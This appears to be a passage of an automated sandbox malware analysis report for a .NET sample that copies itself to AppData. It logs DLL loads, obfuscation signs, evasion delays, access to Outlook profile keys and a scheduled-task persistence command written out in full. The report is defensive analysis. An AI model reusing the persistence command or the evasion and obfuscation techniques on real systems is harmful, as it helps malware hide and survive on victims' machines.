                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: vaultcli.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: z1E-catalogSamples.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: z1E-catalogSamples.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.cs | .Net Code: eKVopiT5yk System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Code function: 6_2_03040C3D push edi; ret 6_2_03040CC2
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Code function: 6_2_03040C95 push edi; retf 6_2_03040C3A
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Code function: 7_2_066304E6 push esi; ret 7_2_066304E7
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Code function: 12_2_013D0C3D push edi; ret 12_2_013D0CC2
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Code function: 12_2_06D46ED1 push es; ret 12_2_06D46EE0
                      Source: z1E-catalogSamples.exe | Static PE information: section name: .text entropy: 7.919359410493161
                      Source: vZkoWbol.exe.0.dr | Static PE information: section name: .text entropy: 7.919359410493161
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, zsIBsGprx7y00SlIL7.cs | High entropy of concatenated method names: 'WPCeObyGsQ', 'uABeTAh4rM', 'Bkee1cyswW', 'WCjerSFmRu', 'cvXeW9Mjc2', 'LGfegi6soH', 'dFceBuoj3w', 'kM1e3PYeLB', 'kOee5qqjok', 'BqDedL32og'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, VaZUh3SsMeAhplRM43.cs | High entropy of concatenated method names: 'RFi1E1Sdg9', 'FlV1K93LYC', 'RDX12cFZtq', 'kcY1nqIlYn', 'cYn1kGugck', 'i5L1AUu8hX', 'vVp1SxapUF', 'X9L1eXhvKL', 'ipR1hiyRh6', 'S1a1LoT5aG'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, TVTsHyVh9E8nWg1aXa.cs | High entropy of concatenated method names: 'TwxSy4kxva', 'b1eS0qXYPA', 'FDneUEmcpw', 'J87eRl7ODk', 'ErKSi2NABD', 'm6TSYJ8N6t', 'P1uSZ2CZak', 'jCYSJ9HA0s', 'mAHSXIGPG8', 'jL0Sx9XCBO'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, ua5doSJ7xEFnqoqZ3t.cs | High entropy of concatenated method names: 'QeOpZq4tJ', 'JlYET9xkU', 'h4QKAP3NJ', 'XEi70H5lp', 'NOLnuBEVp', 'PYDqYgnYR', 'oKg3Da3te2RM3vKF2K', 'wpb3YEP5oxiNTi2ynd', 'hqCepcruq', 'x2CLYN6sC'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, XNS3vO9VxiNDvVjZ2y.cs | High entropy of concatenated method names: 'jjhgOH5kKq', 'mBVg1SdAhU', 'uawgWd0rsE', 'rfgW07mo97', 'exMWzfiAaP', 'oIIgUdnkpt', 'hyXgRLWrZs', 'CgSgG48xmU', 'F8Tg9q83Fv', 'M9egopu05F'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, bYiFRZ3d8t9GXJpa0hg.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SGWLJp28tK', 'vYgLXX1OvJ', 'H8qLxWnffG', 'EwPLNeRuPq', 'NKGLbnEwfd', 'D5hLvF91Tf', 'YUjLMcZyw5'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, jL7RclWwY3ulO0Zff7.cs | High entropy of concatenated method names: 'Dispose', 'vgBRVS5UEP', 'm29GfdE9c7', 'eKyttr86Bq', 'LKSR06YuE8', 'ErRRzMJNo4', 'ProcessDialogKey', 'cweGUo1rYP', 'ihtGRWTAf8', 'kEmGG3IF1k'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, Rg4Hth3YWlcNWQjCSnN.cs | High entropy of concatenated method names: 'Yjlh4wd9JJ', 'c51h6uDUZl', 'B3OhpTC4PR', 'bYqhEm88YB', 'm30hHYVeBh', 'lkRhKEUmWU', 'CcXh7fnrh6', 'HAOh2ZW3A4', 'CwvhnBjdOu', 'wXBhqTw49N'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, hBQirUUkqhh6Jbx8WV.cs | High entropy of concatenated method names: 'ToString', 'DQXAiFMEHw', 'ewWAfy8Hdx', 'nuGACaq6Ob', 'WoVAQuF4MP', 'PheAukTI50', 'xgKAjn18PP', 'qBwAPEkHGS', 'aXfAc3mVkt', 'XiSAIql2Yq'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, RoS3anzlodaHo4f0kx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Kcpha5xCKa', 'pKMhkKPWlJ', 'MD7hAuLFQP', 'dvrhSJo14i', 'vGhhegOCs1', 'sxPhhO9dFb', 'PAohLXBLnd'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, GI6qPVywYa6hUIfxPh.cs | High entropy of concatenated method names: 'V1hg44HuJl', 'dygg6KUpZq', 'MC2gpJYnd0', 'lFXgEU2ERp', 'Jy6gHf86Om', 'y3ogKxJKju', 'a8Jg7mRWQl', 'DAvg2CIvvh', 'zMbgnoRmct', 'rlNgq9myNP'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, yXhJbKosLlKpW8rNLB.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYhGVfTJV6', 'FHEG0cpLwZ', 'DXhGz16LZp', 'lR79Uk5kfF', 'xs69RbWtoF', 'M8u9GfQ99K', 'IZk99geNe0', 'PBARhyeypwUqAMOEAj3'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, Tlmb0tBy4UyoTJGQIH.cs | High entropy of concatenated method names: 'ikTRgGGyXn', 'vOkRBuoxRH', 'F97R5SNlyl', 'MfARdFVRtg', 'eXQRkChPex', 'S8MRAb2WER', 'AAaLeKUO2TjFLj1GD4', 'YsOXJIwIbTm45ig1Gv', 'CAMRReNyyi', 'IWiR9TXOfb'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, RnrwAqRj72ywa7Gpgw.cs | High entropy of concatenated method names: 'K9prHPZAN3', 'oOar7g68J1', 'x3Z1CVg2NJ', 'G9Q1QpQRVH', 'nnF1uCxFJS', 'tPp1jZoKfS', 'EFx1PPo2hE', 'SGb1ck5DoX', 'Xtv1IdmJmv', 'kJc1FP60ps'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, okO7TJK9dCinF3LmXR.cs | High entropy of concatenated method names: 'qgRe86Wch3', 'OIPefmicdy', 'cDoeCvUklp', 'v1YeQEgPQ5', 'AZ9eJWQgkC', 'tDWeuouigl', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, eBNdtB6YbfWXnOO34y.cs | High entropy of concatenated method names: 'F6yhRQDBtL', 'ftXh9yOOwp', 'F0HhoKLI8t', 'bIehOyoQT1', 'pexhTGcMqq', 'Yyuhru0FOb', 'V6JhWjJqUU', 'EfpeMZZbi7', 'tKney71S21', 'Y9neV0Unof'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, wvggNWtakVgut5bwxI.cs | High entropy of concatenated method names: 'dcekFwM2Gr', 'qcykYs8wnd', 'RGskJD8oYt', 'AjIkXZ0p3K', 'f9bkfLg77S', 'LtbkCQXhYk', 'PfdkQLuxQN', 'kodkuN7rpp', 'r8FkjrUiNr', 'z00kPpLFsa'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, QPjoRCFxAbeZCiTRbI.cs | High entropy of concatenated method names: 'M0uWwxcl8v', 'YkUWTys6ee', 'FHTWru6lvx', 'keoWgVoDPT', 'E6RWBkFoot', 'Mbtrbw5i0F', 'aghrvU6Zyc', 'CrJrMCQxcd', 'MaLryk6PxS', 'WVDrVmwulf'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, PMi9hoic7ZJQUNCSpP.cs | High entropy of concatenated method names: 'aUQa2x6VWD', 'AKxanL9f5Q', 'Fqia8sIRRs', 'AkGaf0JFL9', 'sOCaQLUCNZ', 'LS2auSsLvE', 'MMbaPK8SoW', 'WZBacv6YiD', 'QBeaFNYo8U', 'g5Oaiqv9JB'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, CSOZU5vUWRw9E4Q4d3.csHigh entropy of concatenated method names: 'k5mS56vfUP', 'kjlSdtR0cX', 'ToString', 'Gb2SOEwuRR', 'KuPSTDa7ju', 'a46S1pqmte', 'utvSrSLkTD', 'lYZSWxOOQQ', 'yMeSgL5OaW', 'u3rSBaNIhM'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, WeRTmg58MlbmW9GQYv.csHigh entropy of concatenated method names: 'NqKTJ325CM', 'tnwTXAnDdR', 'KALTxcjlQT', 'V2dTNXnZf8', 'bXkTbwZJAV', 'MkUTvGNGsP', 'YIUTMIrnKt', 'SkxTy3F1t3', 'bjYTV4BaY6', 'ic9T0LgjIg'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.csHigh entropy of concatenated method names: 'c2d9wHtSmJ', 'XS69OIMOWH', 'ghN9TbGxmW', 'D6c91Vc6Gy', 'cnn9rV4Ylw', 'K9K9W6FxYE', 'qF89gVT2mY', 'q7N9BLQtl4', 'bmv93ww16i', 'Phc95tV7vX'
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile created: C:\Users\user\AppData\Roaming\vZkoWbol.exeJump to dropped file

                      Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 1610000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 3140000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 3070000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 65C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 75C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 7800000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 8800000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 2F50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory allocated: 3200000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 1790000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 31C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 6640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 7640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 7880000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 8880000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 13D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 30E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory allocated: 2F10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 600000
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599890
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599781
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599671
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599562
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599438
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599328
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599219
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599109
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 599000
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 598890
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 598781
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 300000
